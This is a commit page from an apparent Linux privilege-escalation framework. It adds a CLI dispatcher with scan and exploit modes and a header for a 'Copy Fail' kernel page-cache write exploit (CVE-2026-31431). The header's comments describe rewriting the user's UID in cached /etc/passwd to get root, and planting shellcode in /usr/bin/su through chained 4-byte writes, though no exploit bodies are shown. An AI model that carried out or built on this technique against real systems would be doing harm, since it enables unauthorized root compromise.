leviathan/SKELETONKEY
1
0
Fork 0
Code Issues Pull Requests Actions 21 Packages Projects Releases Wiki Activity

Phase 1: module interface + registry + top-level dispatcher

Browse Source 
- core/module.h: struct iamroot_module + iamroot_result_t
- core/registry.{h,c}: flat-array module registry with find-by-name
- modules/copy_fail_family/iamroot_modules.{h,c}: bridge layer
  exposing 5 modules (copy_fail, copy_fail_gcm, dirty_frag_esp,
  dirty_frag_esp6, dirty_frag_rxrpc) wired to the absorbed DIRTYFAIL
  detect/exploit functions; df_result_t/iamroot_result_t share numeric
  values intentionally for zero-cost translation
- iamroot.c: top-level CLI dispatcher with --scan / --list / --exploit /
  --mitigate / --cleanup, JSON output, --i-know gate
- Restored modules/copy_fail_family/src/ structure (DIRTYFAIL Makefile
  expects it; the initial flat copy broke that contract)
- Top-level Makefile builds one binary; filters out DIRTYFAIL's
  original dirtyfail.c main so it doesn't conflict with iamroot.c

Verified end-to-end on kctf-mgr (Linux): clean compile, 5 modules
register, --scan --json output ingest-ready, exit codes propagate.
This commit is contained in:
KaraZajac
2026-05-16 19:32:11 -04:00
parent cf30b249de
commit 52e8c99022
30 changed files with 673 additions and 18 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/copy_fail_family/src/copyfail.h
+33
View File
@@ -0,0 +1,33 @@
/*
* DIRTYFAIL — copyfail.h
*
* Public surface for the Copy Fail (CVE-2026-31431) module.
*/
#ifndef DIRTYFAIL_COPYFAIL_H
#define DIRTYFAIL_COPYFAIL_H
#include "common.h"
/* Run all preflight checks and the sentinel-file primitive probe.
* Never modifies system files. */
df_result_t copyfail_detect(void);
/* Real PoC: flip the running user's 4-digit UID in /etc/passwd page
* cache to "0000" and (optionally) execve `su <user>` to drop a root
* shell. `do_shell` controls whether to invoke su; if false, the patch
* is reverted via POSIX_FADV_DONTNEED before returning so the system
* does not stay in a broken state. */
df_result_t copyfail_exploit(bool do_shell);
/* Low-level building block: write 4 bytes into the page cache of
* `target_path` at `target_off`. Caller must have read access to
* the file. Same primitive that copyfail_exploit uses internally;
* exposed for exploit_su.c to chain ~12 calls into a 48-byte
* shellcode plant against /usr/bin/su. Returns true if the AF_ALG
* sequence completed; caller MUST verify via re-read. */
bool cf_4byte_write(const char *target_path,
off_t target_off,
const unsigned char four_bytes[4]);
#endif